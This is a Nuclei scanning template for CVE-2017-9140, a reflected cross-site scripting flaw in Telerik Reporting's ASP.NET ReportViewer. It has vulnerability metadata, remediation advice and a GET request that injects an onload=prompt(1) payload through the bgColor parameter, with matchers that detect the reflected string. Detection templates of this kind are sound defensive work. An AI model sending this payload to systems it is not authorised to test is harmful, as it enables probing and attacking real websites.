nuclei-templates/cves/2017/CVE-2017-9140.yaml

37 lines
1.2 KiB
YAML

id: CVE-2017-9140
info:
name: Reflected XSS - Telerik Reporting Module
author: dhiyaneshDk
severity: medium
tags: cve,cve2017,xss,telerik
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
reference:
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-9140
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
condition: and
# Enhanced by cs on 2022/02/28